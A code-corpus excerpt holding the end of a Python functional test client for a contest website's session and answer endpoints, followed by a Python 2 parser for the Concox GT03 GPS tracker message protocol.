if self.sid is None and 'contest2' in cookies:
self.sid = cookies['contest2'].value
str_body = response.read().decode("UTF-8")
try:
body = json.loads(str_body)
return body, hints
except Exception as ex:
print("JSON parsing error during request on {}".format(endpoint))
print(str(params))
print(str(ex))
print("the server response follows:")
print(str_body)
raise ex
def post_data_request(self, params):
return self.post_generic_request('data.php', params)
def post_answer_request(self, params):
return self.post_generic_request('answer.php', params)
def post_solutions_request(self, params):
return self.post_generic_request('solutions.php', params)
def checkHints(self, received, expected):
""" checkHints takes the received header (string) and list of
expected headers, prints any mismatches.
"""
rec_list = read_http_header_value(received)
for exp_value in expected:
if exp_value not in rec_list:
self.messages.append("missing: {}".format(exp_value))
for rec_value in rec_list:
if rec_value not in expected:
self.messages.append("unexpected: {}".format(rec_value))
def beginTest(self, name):
self.test_name = name
self.messages = list()
def endTest(self):
if self.messages:
print("\033[31;1m{}\033[0m".format(self.test_name))
for message in self.messages:
print("\033[31m{}\033[0m".format(message))
else:
print("\033[32m{}\033[0m".format(self.test_name))
def loadNewSession(self):
self.beginTest('loadNewSession')
body, hints = self.post_data_request({'action': 'loadSession'})
if not body.get('success', False):
raise Exception('loadSession: failed')
if 'SID' not in body or body['SID'] != self.sid:
raise Exception('loadSession: bad or missing SID')
self.checkHints(
hints,
[
"ClientIP.loadSession:new"
])
self.endTest()
def loadOldSession(self, check=True):
self.beginTest('loadOldSession')
body, hints = self.post_data_request({'action': 'loadSession'})
if not body.get('success', False):
raise Exception('loadSession: failed')
if 'SID' not in body or body['SID'] != self.sid:
raise Exception('loadSession: bad or missing SID')
if check:
self.checkHints(
hints,
[
"ClientIP.loadSession:found",
"SessionId({}):loadSession".format(self.sid)
])
self.endTest()
def destroySession(self, check=True):
self.beginTest('destroySession')
body, hints = self.post_data_request({'action': 'destroySession'})
if not body.get('success', False):
raise Exception('destroySession: failed')
if 'SID' not in body or body['SID'] != self.sid:
raise Exception('destroySession: bad or missing SID')
if check:
self.checkHints(
hints,
[
"ClientIP.destroySession"
])
self.endTest()
def loadPublicGroups(self):
self.beginTest('loadPublicGroups')
body, hints = self.post_data_request({'action': 'loadPublicGroups'})
if not body.get('success', False):
raise Exception('loadPublicGroups: failed')
self.checkHints(
hints, ["ClientIP.loadPublicGroups"])
self.group_code = body['groups'][-1]['code']
self.endTest()
def checkNoPassword(self):
self.beginTest('checkNoPassword')
body, hints = self.post_data_request({
'action': 'checkPassword'
})
if body.get('success', False):
raise Exception('unexpected success')
self.checkHints(
hints, [
"ClientIP.error",
"ClientIP.checkPassword:fail"
])
self.endTest()
def checkGroupPassword(self):
self.beginTest('checkGroupPassword')
body, hints = self.post_data_request({
'action': 'checkPassword',
'password': self.group_code,
'getTeams': False
})
if not body.get('success', False):
raise Exception('checkPassword(group): failed')
self.group = body
self.group_id = body.get('groupID')
self.checkHints(
hints, [
"ClientIP.checkPassword:pass",
"Group({}):checkPassword".format(self.group_id)
])
# {"groupID": "8506", "askGrade": true, "askStudentId": false, "askPhoneNumber": false,
# "success": true, "askEmail": false, "bRecovered": "0",
# "contestFolder": "2016_algorea_1_toaioxxapt", "teams": "",
# "fullFeedback": "1", "allowTeamsOfTwo": "0", "newInterface": "1",
# "contestName": "Entra\\u00eenement Algor\\u00e9a 2016 premier tour",
# "name": "Algor\\u00e9a 2016 premier tour : tous les niveaux",
# "contestID": "777116237588142336", "contestOpen": "Open",
# "contestShowSolutions": "1", "customIntro": null, "askGenre": true,
# "askZip": false, "nbUnlockedTasksInitial": "4",
# "nbMinutesElapsed": "478039", "bonusScore": "0", "subsetsSize": "0",
# "nbMinutes": "45", "contestVisibility": "Visible", "isPublic": "1"}
self.endTest()
def createTeam(self):
self.beginTest('createTeam')
body, hints = self.post_data_request({
'action': 'createTeam',
'contestants[0][lastName]': 'Anonymous',
'contestants[0][firstName]': 'Anonymous',
'contestants[0][genre]': '2',
'contestants[0][email]': '',
'contestants[0][zipCode]': ''
})
if not body.get('success', False):
raise Exception('createTeam: failed')
self.team_id = body.get('teamID')
self.team_code = body.get('password')
self.checkHints(
hints, [
"ClientIP.createTeam:public",
"Group({}):createTeam".format(self.group_id)
])
self.endTest()
def checkTeamPassword(self):
self.beginTest('checkTeamPassword')
body, hints = self.post_data_request({
'action': 'checkPassword',
'password': self.team_code,
'getTeams': False
})
if not body.get('success', False):
raise Exception('failed')
self.checkHints(
hints, [
"ClientIP.checkPassword:pass",
"Team({}):checkPassword".format(self.team_id)
])
self.endTest()
def loadContestData(self):
self.beginTest('loadContestData')
body, hints = self.post_data_request({
'action': 'loadContestData'
})
if not body.get('success', False):
raise Exception('loadContestData: failed')
self.checkHints(
hints, [
"ClientIP.loadContestData:pass",
"Team({}):loadContestData".format(self.team_id)
])
# {'success': True, 'teamPassword': '8rzmzsjn',
# 'questionsData': {
# '274': {'name': 'Variables', 'order': 4, 'noAnswerScore': 0,
# 'options': {}, 'minScore': 0, 'folder': 'algorea_2016',
# 'ID': '274', 'key': '2016-FR-19-minmax-variables',
# 'maxScore': 40, 'answerType': '0'}, ...},
# 'answers': [], 'scores': [], 'timeUsed': '0', 'endTime': None}
self.endTest()
def getRemainingTime(self):
self.beginTest('getRemainingTime')
body, hints = self.post_data_request({
'action': 'getRemainingTime',
'teamID': self.team_id
})
if not body.get('success', False):
raise Exception('getRemainingTime: failed')
self.checkHints(
hints, [
"ClientIP.getRemainingTime:pass",
"Team({}):getRemainingTime".format(self.team_id)
])
# {'success': True, 'remainingTime': 2700}
self.endTest()
def closeContest(self):
self.beginTest('closeContest')
body, hints = self.post_data_request({
'action': 'closeContest'
})
if not body.get('success', False):
raise Exception('closeContest: failed')
self.checkHints(
hints, [
"ClientIP.closeContest:pass",
"Team({}):closeContest".format(self.team_id)
])
self.endTest()
def sendAnswer(self):
self.beginTest('sendAnswer')
body, hints = self.post_answer_request({
'answers[270][answer]': '{"easy":"2 2 4 1","medium":"","hard":""}',
# 'answers[270][sending]': "true", # not used
'answers[270][score]': 99999,
'teamID': self.team_id,
'teamPassword': self.team_code
})
if not body.get('success', False):
raise Exception('sendAnswer: failed')
self.checkHints(
hints, [
"ClientIP.answer:pass",
"Team({}):answer".format(self.team_id)
])
self.endTest()
def getSolutions(self):
self.beginTest('getSolutions')
body, hints = self.post_solutions_request({'ieMode': 'false'})
if not body.get('success', False):
raise Exception('getSolutions: failed')
self.checkHints(
hints, [
"ClientIP.solutions:pass",
"Team({}):solutions".format(self.team_id)
])
self.endTest()
def run(self):
try:
self.loadNewSession()
self.destroySession()
self.loadPublicGroups()
self.loadNewSession()
self.checkNoPassword()
self.checkGroupPassword()
self.createTeam()
self.loadOldSession()
print('team code: {}'.format(self.team_code))
self.checkTeamPassword()
self.loadContestData()
self.getRemainingTime()
self.sendAnswer()
self.closeContest()
self.getSolutions()
except Exception as ex:
print("{}: caught {}".format(self.test_name, ex))
traceback.print_exc(file=sys.stdout)
if __name__ == '__main__':
Transaction(
# host='concours.castor-informatique.fr',
host='castor.home.epixode.fr',
base='/contestInterface/',
http_host='concours.castor-informatique.fr'
).run()
# body, hints = self.post_data_request({'action': 'checkPassword', 'password': '3m9trav3'})
| 36.454039
| 95
| 0.560098
|
52a1eed7213f28307ab010f76a0469ac671483cd
| 28,613
|
py
|
Python
|
pythonlibs/mantis/BlueEarth/vendor/concox/gt03/message.py
|
adoggie/Tibet.6
|
3c53060edafd80b9c4dafa10699a68d86a410c66
|
[
"MIT"
] | 22
|
2019-10-28T07:28:12.000Z
|
2022-03-19T15:36:41.000Z
|
pythonlibs/mantis/BlueEarth/vendor/concox/gt03/message.py
|
adoggie/Tibet.6
|
3c53060edafd80b9c4dafa10699a68d86a410c66
|
[
"MIT"
] | 1
|
2019-11-07T04:54:14.000Z
|
2019-11-07T07:12:48.000Z
|
pythonlibs/mantis/BlueEarth/vendor/concox/gt03/message.py
|
adoggie/Tibet.6
|
3c53060edafd80b9c4dafa10699a68d86a410c66
|
[
"MIT"
] | 13
|
2019-10-28T07:29:07.000Z
|
2021-11-03T06:53:12.000Z
|
#coding:utf-8
import datetime
import struct
from protocal import PacketType,MessageClsDict,TypeValue
from utils import ByteBuf
from mantis.fundamental.utils.useful import hash_object,object_assign
from mantis.fundamental.utils.useful import singleton
TIME_EAST = 0
TIME_WEST = 1
CONNECTED = 0
DISCONNECT = 1
GPS_YES = 1 # GPS 已定位
GPS_NO = 0 # GPS 未定位
ON = 1
OFF = 0
LOW =0
HIGH = 1
# GPS 实时补传
GPS_UP_MODE_REAL = 0
GPS_UP_MODE_DELAY = 1 # 0x00 实时上传 0x01 补传
class MessageBase(object):
def __init__(self):
self.extra = None
self.name = ''
def dict(self):
data = hash_object(self,excludes=('extra','Type'))
return data
def from_dict(self, data):
object_assign(self,data)
class DownStream(object):
"""下行命令"""
def __init__(self):
pass
def packet(self):
from packet import NetWorkPacketAllocator
pkt = NetWorkPacketAllocator().createPacket()
pkt.type = self.Type.value
class MessageLogin(MessageBase):
""""""
Type = PacketType.Login
def __init__(self):
MessageBase.__init__(self)
self.device_id = ''
self.device_type = 0
self.timezone = 0
self.eastwest = TIME_EAST
self.language = 0
def response(self):
"""登录回复消息包序列化数据"""
netpack = self.extra
netpack.set_payload('')
return netpack.to_bytes()
@staticmethod
def unmarshall(bytes,extra=None):
buf = ByteBuf(bytes)
s = buf.read_bytes(8)
msg = MessageLogin()
msg.device_id = ''.join(map(lambda _:'%02x'%_,map(ord,s)))
if msg.device_id[0] == '0':
msg.device_id = msg.device_id[1:]
value = buf.read_uint16()
msg.eastwest = (value>>3) & 1
msg.timezone = (value>>4) / 100
msg.extra = extra
return msg
def dict(self):
return hash_object(self)
def from_dict(self,data):
object_assign(self,data)
class LanguageValue(object):
CHINESE = 1
ENGLISH = 2
def __init__(self):
self.value = self.CHINESE
class AlarmType(object):
OK = TypeValue(0x00,u'正常')
SOS = TypeValue(0x01,u'SOS求救')
POWER_OFF = TypeValue(0x02,u'断电报警')
SHAKE = TypeValue(0x03,u'震动报警')
FENCE_ENTER = TypeValue(0x04,u'进围栏报警')
FENCE_LEAVE = TypeValue(0x05,u'出围栏报警')
SPEED_OVER = TypeValue(0x06,u'超速报警')
POSITION_MOVE = TypeValue(0x09,u'位移报警')
BLIND_AREA_ENTER = TypeValue(0x0A,u'进GPS盲区报警')
BLIND_AREA_LEAVE = TypeValue(0x0B,u'出GPS盲区报警')
TURN_ON = TypeValue(0x0C,u'开机报警')
FIRST_LOCATED = TypeValue(0x0D,u'GPS第一次定位报警')
LOWER_POWER = TypeValue(0x0E,u'外电低电报警')
LOWER_POWER_PROTECT = TypeValue(0x0F,u'外电低电保护报警')
CHANGE_SIMCARD = TypeValue(0x10,u'换卡报警')
SHUTDOWN = TypeValue(0x11,u'关机报警')
FLY_MODE = TypeValue(0x12,u'外电低电保护后飞行模式报警')
DISMANTLE = TypeValue(0x13,u'拆卸报警')
DOOR_ALARM = TypeValue(0x14,u'门报警')
LOW_POWER_SHUTDOWN = TypeValue(0x15,u'低电关机报警')
SOUND_ALARM = TypeValue(0x16,u'声控报警')
FAKE_STATION = TypeValue(0x17,u'伪基站报警')
OPEN_BOX = TypeValue(0x18,u'开盖报警')
BATTERY_LOW = TypeValue(0x19,u'内部电池低电报警')
START_SLEEP = TypeValue(0x20,u'进入深度休眠报警')
# 0x21预留
# 0x22预留
FALL = TypeValue(0x23,u'跌倒报警')
# 0x24预留
LIGHT_ALARM = TypeValue(0x25,u'光感报警')
SHUTDOWN_2 = TypeValue(0x28,u'主动离线(关机)报警')
SPEED_UP_ACCEL = TypeValue(0x29,u'急加速')
TURN_LEFT = TypeValue(0x2A,u'左急转弯报警')
TURN_RIGHT = TypeValue(0x2B,u'右急转弯报警')
COLLISION = TypeValue(0x2C,u'碰撞报警')
SPEED_DOWN_ACCEL = TypeValue(0x30,u'急减速')
GROUP_LEAVE = TypeValue(0x31,u'离群报警')
FLIP = TypeValue(0x32,u'拔除翻转报警')
LOCK = TypeValue(0x33,u'上锁锁上报')
UNLOCK = TypeValue(0x34,u'开锁上报')
UNLOCK_UNNORMAL = TypeValue(0x35,u'异常开锁报警')
UNLOCK_FAIL = TypeValue(0x36,u'开锁失败报警')
ACC_ON = TypeValue(0xFF,u'ACC关')
ACC_OFF = TypeValue(0xFE,u'ACC开')
table = {}
@staticmethod
def init_table():
attrs = [s for s in dir(AlarmType) if not s.startswith('__')]
for k in attrs:
attr = getattr(AlarmType,k)
if not callable(attr) and not isinstance(attr,dict):
# print k,attr
AlarmType.table[attr.value] = attr
@staticmethod
def get_name(type_id):
alarm = AlarmType.table.get(type_id)
name = ''
if alarm:
name = alarm.comment
return name
AlarmType.init_table()
class VoltageValue(object):
EMPTY = TypeValue(0x00,u'无电(关机)')
L1 = TypeValue(0x01,u'电量极低(不足以打电话发短信等)')
L2 = TypeValue(0x02,u'电量很低(低电报警)')
L3 = TypeValue(0x03,u'电量低(可正常使用)')
L4 = TypeValue(0x04,u'电量中')
L5 = TypeValue(0x05,u'电量高')
L6 = TypeValue(0x06,u'电量极高')
# 设备电压百分比显示参考:6=100% 5=70% 4=40% 3=15% 2=5% 1=1%
def __init__(self):
self.value = self.EMPTY
class GSMSignalValue(object):
EMPTY = TypeValue(0x00,u'无信号')
L1 = TypeValue(0x01,u'信号极弱')
L2 = TypeValue(0x02,u'信号较弱')
L3 = TypeValue(0x03,u'信号良好')
L4 = TypeValue(0x04,u'信号强')
def __init__(self):
self.value = self.EMPTY
class DeviceSimpleInfo(object):
def __init__(self):
self.oil_bit7 = DISCONNECT # 1:油电断开
self.gps_bit6 = GPS_NO # GPS 是否已定位
self.charging_bit2 = CONNECTED # 已接电源充电
self.acc_bit1 = HIGH # 1:ACC 高 , 0:ACC 低
self.fortify_bit0 = ON # 1:设防 , 0:撤防
def parse(self,byte):
self.oil_bit7 = byte >> 7
self.gps_bit6 = (byte >> 6) & 1
self.charging_bit2 = (byte >> 2) & 1
self.acc_bit1 = (byte >> 1) & 1
self.fortify_bit0 = byte & 1
def dict(self):
return hash_object(self)
def from_dict(self,data):
object_assign(self,data)
class LocationReportMode(object):
"""数据点上报类型"""
T0 = TypeValue(0x00,u'定时上报')
T1 = TypeValue(0x01,u'定距上报')
T2 = TypeValue(0x02,u'拐点上传')
T3 = TypeValue(0x03,u'ACC 状态改变上传')
T4 = TypeValue(0x04,u'从运动变为静止状态后,补传最后一个定位点')
T5 = TypeValue(0x05,u'网络断开重连后,上报之前最后一个有效上传点')
T6 = TypeValue(0x06,u'上报模式:星历更新强制上传 GPS 点')
T7 = TypeValue(0x07,u'上报模式:按键上传定位点')
T8 = TypeValue(0x08,u'上报模式:开机上报位置信息')
T9 = TypeValue(0x09,u'上报模式:未使用')
Ta = TypeValue(0x0a,u'上报模式:设备静止后上报最后的经纬度,但时间更新')
Tb = TypeValue(0x0b,u'WIFI 解析经纬度上传包')
Tc = TypeValue(0x0c,u'上报模式:LJDW(立即定位)指令上报')
Td = TypeValue(0x0d,u'上报模式:设备静止后上报最后的经纬度')
Te = TypeValue(0x0e,u'上报模式:GPSDUP 上传(下静止状态定时上传)')
def __init__(self):
self.value = self.T0
class LocationData(object):
def __init__(self):
self.ymdhms = ''
self.satellite = 0
self.lon = 0
self.lat = 0
self.speed = 0
self.heading = 0
self.mode = 'r' # real or diff 实时还是差分 r / d
self.located = 'y' # y or n 是否已定位
self.west_east= 'e' # w or e 东经西经
self.north_south = 'n' # n or s
# self.mcc = 0
# self.mnc = 0
# self.lac = 0
# self.cell_id = 0
# self.lang = 0
def dict(self):
return hash_object(self)
def from_dict(self,data):
object_assign(self,data)
def parse_time(self,buf):
y = 2000 + buf.read_uint8()
m = buf.read_uint8()
d = buf.read_uint8()
h = buf.read_uint8()
M = buf.read_uint8()
s = buf.read_uint8()
# dt = datetime.datetime(y, m, d, h, M, s) + datetime.timedelta(hours=8)
# y = dt.year
# m = dt.month
# d = dt.day
# h = dt.hour
# M = dt.minute
# s = dt.second
# self.ymdhms = '{}{}{} {}:{}:{}'.format(y,m,d,h,M,s)
self.ymdhms = '{}{:02d}{:02d} {:02d}:{:02d}:{:02d}'.format(y, m, d, h, M, s)
def parse(self,buf ):
# y = 2000 + buf.read_uint8()
# m = buf.read_uint8()
# d = buf.read_uint8()
# h = buf.read_uint8()
# M = buf.read_uint8()
# s = buf.read_uint8()
# dt = datetime.datetime(y,m,d,h,M,s) + datetime.timedelta(hours=8)
# y = dt.year
# m = dt.month
# d = dt.day
# h = dt.hour
# M = dt.minute
# s = dt.second
# # self.ymdhms = '{}{}{} {}:{}:{}'.format(y,m,d,h,M,s)
# self.ymdhms = '{}{:02d}{:02d} {:02d}:{:02d}:{:02d}'.format(y, m, d, h, M, s)
self.parse_time(buf)
ui8 = buf.read_uint8()
v = [ (ui8>>4) & 0xf,(ui8 & 0xf)]
# self.satellite = '%s %s'% tuple(v)
self.satellite = v[1]
self.lat = buf.read_uint32()/1800000.
self.lon = buf.read_uint32() / 1800000.
self.speed = buf.read_uint8()
ui16 = buf.read_uint16()
self.heading = ui16 & 0b1111111111
self.north_south = 's'
if (ui16>>10) & 0x01 :
self.north_south = 'n'
self.west_east = 'w'
if (ui16>>11) & 0x01 == 0:
self.west_east = 'e'
self.located = 'n'
if (ui16>>12) & 0x01 == 1:
self.located = 'y'
self.mode = 'd'
if (ui16>>13) & 0x01 == 0 :
self.mode = 'r'
# self.mcc = buf.read_uint16()
# self.mnc = buf.read_uint8()
# self.lac = buf.read_uint16()
# v = buf.read_bytes(3)
# self.cell_id =v
# self.lang = buf.read_uint16()
# print self.__dict__
class LocationDataExt(object):
def __init__(self):
# LocationData.__init__(self)
self.mcc = 0
self.mnc = 0
self.lac = 0
self.cell_id = 0
self.simple_info = DeviceSimpleInfo()
self.voltage = VoltageValue.EMPTY.value
self.gsm = GSMSignalValue.EMPTY.value
self.alarm = AlarmType.OK.value
self.lang = LanguageValue.CHINESE # 报警语言
def dict(self):
data = self.simple_info.dict()
data.update(hash_object(self,excludes=('simple_info',)))
return data
def from_dict(self,data):
object_assign(self,data)
self.simple_info = DeviceSimpleInfo()
object_assign(self.simple_info,data)
def parse(self,buf ):
# LocationData.parse(self,buf)
self.mcc = buf.read_uint16()
self.mnc = buf.read_uint8()
self.lac = buf.read_uint16()
self.cell_id = tool_format_ci_value( buf.read_bytes(3))
self.simple_info.parse(buf.read_uint8())
self.voltage = buf.read_uint8()
self.gsm = buf.read_uint8()
self.alarm = buf.read_uint8()
self.lang = buf.read_uint8()
class MessageGpsLocation(MessageBase):
"""gps 定位包"""
Type = PacketType.GpsLocation
def __init__(self):
MessageBase.__init__(self)
self.location = LocationData()
# self.acc = LOW
# self.rpt_mode = LocationReportMode.T0.value # 上报模式
# self.up_mode = GPS_UP_MODE_REAL # 上报实时、追加
# self.miles = 0 # 里程数
@staticmethod
def unmarshall(bytes,extra=None):
buf = ByteBuf(bytes)
msg = MessageGpsLocation()
msg.extra = extra
msg.location.parse(buf)
# msg.acc = buf.read_uint8()
# msg.rpt_mode = buf.read_uint8()
# msg.up_mode = buf.read_uint8()
# msg.miles = buf.read_uint32()
return msg
def dict(self):
data = hash_object(self,excludes=('location',))
data.update(self.location.dict() )
return data
def from_dict(self,data):
self.location.from_dict(data)
# self.acc = data.get('acc',LOW)
# self.rpt_mode = data.get('rpt_mode',LocationReportMode.T0.value)
# self.up_mode = data.get('up_mode',GPS_UP_MODE_REAL)
# self.miles = data.get('miles',0)
class MessageLbsStationExtension(MessageBase):
"""基站定位包
460 1 9649 28657 23.1067600250244 114.416069030762 广东省惠州市惠城区江北街道水北
"""
Type = PacketType.LbsStationExtension
def __init__(self):
MessageBase.__init__(self)
self.ymdhms = ''
self.mcc = 0
self.mnc = 0
self.lac = 0
self.cell_id = 0
self.rssi = 0
self.signal = 0
self.lac1 = 0
self.ci1 = 0
self.rssi1 = 0
self.lac2 = 0
self.ci2 = 0
self.rssi2 = 0
self.lac3 = 0
self.ci3 = 0
self.rssi3 = 0
self.lac4 = 0
self.ci4 = 0
self.rssi4 = 0
self.lac5 = 0
self.ci5 = 0
self.rssi5 = 0
self.lac6 = 0
self.ci6 = 0
self.rssi6 = 0
self.lang = 0
def parse_time(self,buf):
y = 2000 + buf.read_uint8()
m = buf.read_uint8()
d = buf.read_uint8()
h = buf.read_uint8()
M = buf.read_uint8()
s = buf.read_uint8()
# dt = datetime.datetime(y, m, d, h, M, s) + datetime.timedelta(hours=8)
# y = dt.year
# m = dt.month
# d = dt.day
# h = dt.hour
# M = dt.minute
# s = dt.second
self.ymdhms = '{}{:02d}{:02d} {:02d}:{:02d}:{:02d}'.format(y, m, d, h, M, s)
@staticmethod
def unmarshall(bytes,extra=None):
buf = ByteBuf(bytes)
msg = MessageLbsStationExtension()
msg.extra = extra
msg.parse_time(buf)
msg.mcc = buf.read_uint16()
msg.mnc = buf.read_uint8()
msg.lac = buf.read_uint16()
msg.cell_id = tool_format_ci_value( buf.read_bytes(3))
msg.rssi = buf.read_uint8()
msg.signal = msg.rssi
msg.lac1 = buf.read_uint16()
msg.ci1 = tool_format_ci_value( buf.read_bytes(3))
msg.rssi1 = buf.read_uint8()
msg.lac2 = buf.read_uint16()
msg.ci2 = tool_format_ci_value( buf.read_bytes(3))
msg.rssi2 = buf.read_uint8()
msg.lac3 = buf.read_uint16()
msg.ci3 = tool_format_ci_value( buf.read_bytes(3))
msg.rssi3 = buf.read_uint8()
msg.lac4 = buf.read_uint16()
msg.ci4 = tool_format_ci_value( buf.read_bytes(3))
msg.rssi4 = buf.read_uint8()
msg.lac5 = buf.read_uint16()
msg.ci5 = tool_format_ci_value( buf.read_bytes(3))
msg.rssi5 = buf.read_uint8()
msg.lac6 = buf.read_uint16()
msg.ci6 = tool_format_ci_value( buf.read_bytes(3))
msg.rssi6 = buf.read_uint8()
return msg
def tool_format_ci_value(bytes):
value = ''.join(map(lambda _:'%02x'%_,map(ord,bytes) ))
# value = '0'+bytes
value = int(value,16)
return value
class MessageHeartBeat(MessageBase):
""""""
Type = PacketType.HeartBeat
def __init__(self):
MessageBase.__init__(self)
self.simple_info = DeviceSimpleInfo()
self.voltage = VoltageValue.EMPTY.value
self.gsm = GSMSignalValue.EMPTY.value
self.lang = LanguageValue.CHINESE
def response(self):
"""回复心跳消息包序列化数据"""
netpack = self.extra
netpack.set_payload('')
return netpack.to_bytes()
@staticmethod
def unmarshall(bytes,extra=None):
buf = ByteBuf(bytes)
msg = MessageHeartBeat()
msg.extra = extra
msg.simple_info.parse(buf.read_uint8())
msg.voltage = buf.read_uint8()
msg.gsm = buf.read_uint8()
msg.lang = buf.read_uint16()
return msg
def dict(self):
data = self.simple_info.dict()
data.update({'voltage':self.voltage,
'gsm':self.gsm,
'lang':self.lang
})
return data
def from_dict(self,data):
self.simple_info.from_dict(data)
self.voltage = data.get('voltage',VoltageValue.EMPTY.value)
self.gsm = data.get('gsm',GSMSignalValue.EMPTY.value)
self.lang = data.get('lang',LanguageValue.CHINESE)
# class MessageDeviceRespOnlineCN(MessageBase):
# """"""
# Type = PacketType.DeviceRespOnlineCN
#
# def __init__(self):
# MessageBase.__init__(self)
#
# def response(self):
# """登录回复消息包序列化数据"""
# netpack = self.extra
# netpack.set_payload('')
# return netpack.to_bytes()
#
# @staticmethod
# def unmarshall(bytes,extra=None):
# buf = ByteBuf(bytes)
# msg = MessageDeviceRespOnlineCN()
# msg.extra = extra
# return msg
# class MessageDeviceRespOnlineEN(MessageBase):
# """"""
# Type = PacketType.DeviceRespOnlineEN
#
# def __init__(self):
# MessageBase.__init__(self)
#
# def response(self):
# """登录回复消息包序列化数据"""
# netpack = self.extra
# netpack.set_payload('')
# return netpack.to_bytes()
#
# @staticmethod
# def unmarshall(bytes,extra=None):
# buf = ByteBuf(bytes)
# msg = MessageDeviceRespOnlineEN()
# msg.extra = extra
# return msg
class MessageAlarmData(MessageBase):
"""gps 报警消息包"""
Type = PacketType.GpsAlarm
def __init__(self):
MessageBase.__init__(self)
self.location = LocationData()
self.lbs_size = 0
self.location_ext = LocationDataExt()
def response(self):
"""登录回复消息包序列化数据"""
netpack = self.extra
netpack.set_payload('')
if self.location_ext.lang == LanguageValue.CHINESE:
netpack.type = PacketType.AddressCNResp.value
msg = MessageAddressCNResp()
netpack.set_payload(msg.marshall())
elif self.location_ext.lang == LanguageValue.ENGLISH:
netpack.type = PacketType.AddressENResp.value
msg = MessageAddressENResp()
netpack.set_payload(msg.marshall())
return netpack.to_bytes()
@staticmethod
def unmarshall(bytes,extra=None):
buf = ByteBuf(bytes)
msg = MessageAlarmData()
msg.extra = extra
msg.location.parse(buf)
msg.lbs_size = buf.read_uint8()
msg.location_ext.parse(buf)
# msg.simple_info.parse(buf.read_uint8())
# msg.voltage = buf.read_uint8()
# msg.gsm = buf.read_uint8()
# msg.alarm = buf.read_uint8()
# msg.lang = buf.read_uint8()
# msg.miles = buf.read_uint32()
return msg
def dict(self):
data = self.location.dict()
data.update(self.location_ext.dict())
data.update(hash_object(self,excludes=('location','location_ext')))
# data.update(self.simple_info.dict())
# data.update({
# 'voltage':self.voltage,
# 'gsm':self.gsm,
# 'alarm':self.alarm,
# 'lang':self.lang,
# 'miles':self.miles
# })
return data
def from_dict(self,data):
self.location.from_dict(data)
object_assign(self,data)
self.location_ext.from_dict(data)
# self.simple_info.from_dict(data)
# self.voltage = data.get('voltage',VoltageValue.EMPTY.value)
# self.gsm = data.get('gsm',GSMSignalValue.EMPTY.value)
# self.alarm = data.get('alarm',AlarmType.OK.value)
# self.lang = data.get('lang',LanguageValue.CHINESE)
# self.miles = data.get('miles',0)
# class MessageFenceAlarm(MessageBase):
# """"""
# Type = PacketType.FenceAlarm
#
# def __init__(self):
# MessageBase.__init__(self)
#
# def response(self):
# """登录回复消息包序列化数据"""
# netpack = self.extra
# netpack.set_payload('')
# return netpack.to_bytes()
#
# @staticmethod
# def unmarshall(bytes,extra=None):
# buf = ByteBuf(bytes)
# msg = MessageFenceAlarm()
# msg.extra = extra
#
# return msg
class MessageLbsAlarmData(MessageBase):
"""lbs 报警包"""
Type = PacketType.LbsAlarm
def __init__(self):
MessageBase.__init__(self)
self.location_ext = LocationDataExt()
def response(self):
"""登录回复消息包序列化数据"""
netpack = self.extra
netpack.set_payload('')
if self.location_ext.lang == LanguageValue.CHINESE:
netpack.type = PacketType.AddressCNResp.value
msg = MessageAddressCNResp()
netpack.set_payload(msg.marshall())
elif self.location_ext.lang == LanguageValue.ENGLISH:
netpack.type = PacketType.AddressENResp.value
msg = MessageAddressENResp()
netpack.set_payload(msg.marshall())
return netpack.to_bytes()
@staticmethod
def unmarshall(bytes,extra=None):
buf = ByteBuf(bytes)
msg = MessageLbsAlarmData()
msg.extra = extra
return msg
def dict(self):
data = self.location_ext.dict()
data.update(hash_object(self, excludes=('location', 'location_ext')))
return data
def from_dict(self, data):
object_assign(self, data)
self.location_ext.from_dict(data)
# class MessageGpsAddressReq(MessageBase):
# """"""
# Type = PacketType.GpsAddressReq
#
# def __init__(self):
# MessageBase.__init__(self)
#
# def response(self):
# """登录回复消息包序列化数据"""
# netpack = self.extra
# netpack.set_payload('')
# return netpack.to_bytes()
#
# @staticmethod
# def unmarshall(bytes,extra=None):
# buf = ByteBuf(bytes)
# msg = MessageGpsAddressReq()
# msg.extra = extra
# return msg
# class MessageLbsAddressReq(MessageBase):
# """"""
# Type = PacketType.LbsAddressReq
#
# def __init__(self):
# MessageBase.__init__(self)
#
# def response(self):
# """登录回复消息包序列化数据"""
# netpack = self.extra
# netpack.set_payload('')
# return netpack.to_bytes()
#
# @staticmethod
# def unmarshall(bytes,extra=None):
# buf = ByteBuf(bytes)
# msg = MessageLbsAddressReq()
# msg.extra = extra
# return msg
class MessageOnlineCommand(MessageBase,DownStream):
"""在线设备发送命令"""
Type = PacketType.OnlineCommandSet
def __init__(self,sequence=0,content='',lang = 0x01):
MessageBase.__init__(self)
self.sequence = sequence
self.content = content
self.lang = lang
def response(self):
"""登录回复消息包序列化数据"""
netpack = self.extra
netpack.set_payload('')
return netpack.to_bytes()
@staticmethod
def unmarshall(bytes,extra=None):
buf = ByteBuf(bytes)
msg = MessageOnlineCommand()
msg.extra = extra
size = buf.read_uint8()
body_size = size - 4
msg.sequence = buf.read_uint32()
msg.content = buf.read_bytes(body_size)
msg.lang = buf.read_uint16()
return msg
def packet(self):
from packet import NetWorkPacket
pkt = NetWorkPacket()
buf = ByteBuf()
size = 4 + len(self.content)
buf.write_uint8(size)
buf.write_uint32(self.sequence)
buf.write_bytes(self.content)
buf.write_uint16(self.lang)
pkt.set_payload(buf.bytes)
pkt.type = self.Type.value
return pkt
def parseContent(self):
return parseContent(self.content)
def parseContent(content):
"""解析上报的设备信息,返回 kv 数据对"""
data={}
print 'Content:',content
cap = '[VERSION]'
if content.find(cap) == 0:
ver = content.split(cap)[-1]
data['ver'] = ver
cap = 'IMEI:'
if content.find(cap) == 0:
items = map(lambda _:_.strip(),content.split(';'))
items = filter(lambda _:_,items)
kvs = dict(map(lambda _:_.split(":"),items))
for k,v in kvs.items():
if k =='IMEI':
data['imei'] = v
if k=='TIMER':
t1,t2,t3 = v.split(',')
data['gps_timer'] = t3 #int(t3) * 60
data['lbs_timer'] = t1 #int(t1) * 60
if k == 'SOS':
p1,p2,p3,p4 = v.split(',')
data['sos_1'] = p1
data['sos_2'] = p2
data['sos_3'] = p3
data['sos_4'] = p4
cap = 'SERVER'
if content.find(cap) == 0:
fs = content.split(',')
if fs[1] == '1':
data['server_mode'] = 'domain'
data['server_domain'] = fs[2]
else:
data['server_ip'] = fs[2]
data['server_port'] = fs[3]
cap ='HBT'
if content.find(cap)==0:
fs = content.split(':')
data['heartbeat_timer'] = int(fs[1])
cap = 'FenceType'
if content.find(cap) == 0:
items = map(lambda _: _.strip(), content.split(','))
